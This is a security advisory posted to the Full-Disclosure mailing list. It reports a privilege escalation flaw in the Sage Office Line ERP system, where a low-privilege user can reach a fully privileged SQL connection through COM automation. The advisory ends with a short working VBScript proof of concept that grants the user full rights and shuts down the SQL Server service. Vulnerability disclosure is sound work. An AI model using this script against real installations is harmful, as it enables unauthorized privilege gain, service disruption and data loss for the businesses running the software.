Security Vulnerability in German ERP system "Sage Office Line"

[x180913erp () hush com]

        Security Vulnerability in German ERP system "Sage office Line"

        Recently, I discovered a Securtiy Security Vulnerability in the
German ERP system "Sage office Line", created by German branch of the
UK-based Sage Group. The Software is sold in Germany, Austria and
Switzerland. According to their website, Sage Germany has more than
250.000 customers.
-------------------------
Affected products:
-------------------------

        - Sage Office Line Evolution 2012 (with newest patches installed)
- Sage Office Line Evolution 2013 (with newest patches installed)
- most likely previous versions (untested)
-------------------------
Effects:
-------------------------

        - Code execution
- privilege escalation
- Data loss
-------------------------
Details:
-------------------------

        The software is based on a Microsoft Access Frontend Client
(available as ADE and ADP) and some server-based tools. Microsoft SQL
Server is used to store all data. A typical client installation on the
computer of each office worker contains the MS Access frontend and
also many .Net assemblies called via COM-interop by the Access client.

        Main entry point for the Vulnerability is the so-called
"mandator-object" which is initiated when a user logs in to the
software. This object holds all information regarding the accessed
database and also about the priviliges of the user. 

        If a user has valid credentials to start the software, even if he has
minimal permissions, he can use local VBScript and COM automation to
gain full access to the mandator object. This object holds, among
other interesting things, an ADO.NET connection object, which was
instantiated with an SQL user with full rights on the affected
database.Using the ADO.NET connection object, the user can give
himself full permissions or even delete all data in the database. 
According to Sage Software, there is a feature called "Erweiterte
Codesicherheit" ("Extended Code Security") which should secure the
system by blocking non-signed code from accessing the System. The
Feature has no effect on the vulnerability described in this post.
        -------------------------
Proof of Concept:
-------------------------

        The following code has to be saved local in a VBS file. Maybe it is
necessary to adjust the path to the MS Access ADE file. It grants full
access to the current user and then tries to shutdown the SQL server
service.

         Set objAccess = GetObject("C:Program Files (x86)SageOffice
Line6.1Abfolabf_001.ade")
 Set goMandant = objAccess.Run("goMandant")
 goMandant.oData.Execute "UPDATE USysSecurityClients SET Rights = 3
WHERE UserName='" &  goMandant.oBenutzer.sName & "'"
 goMandant.oGlobalData.Execute "SHUTDOWN WITH NOWAIT"

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/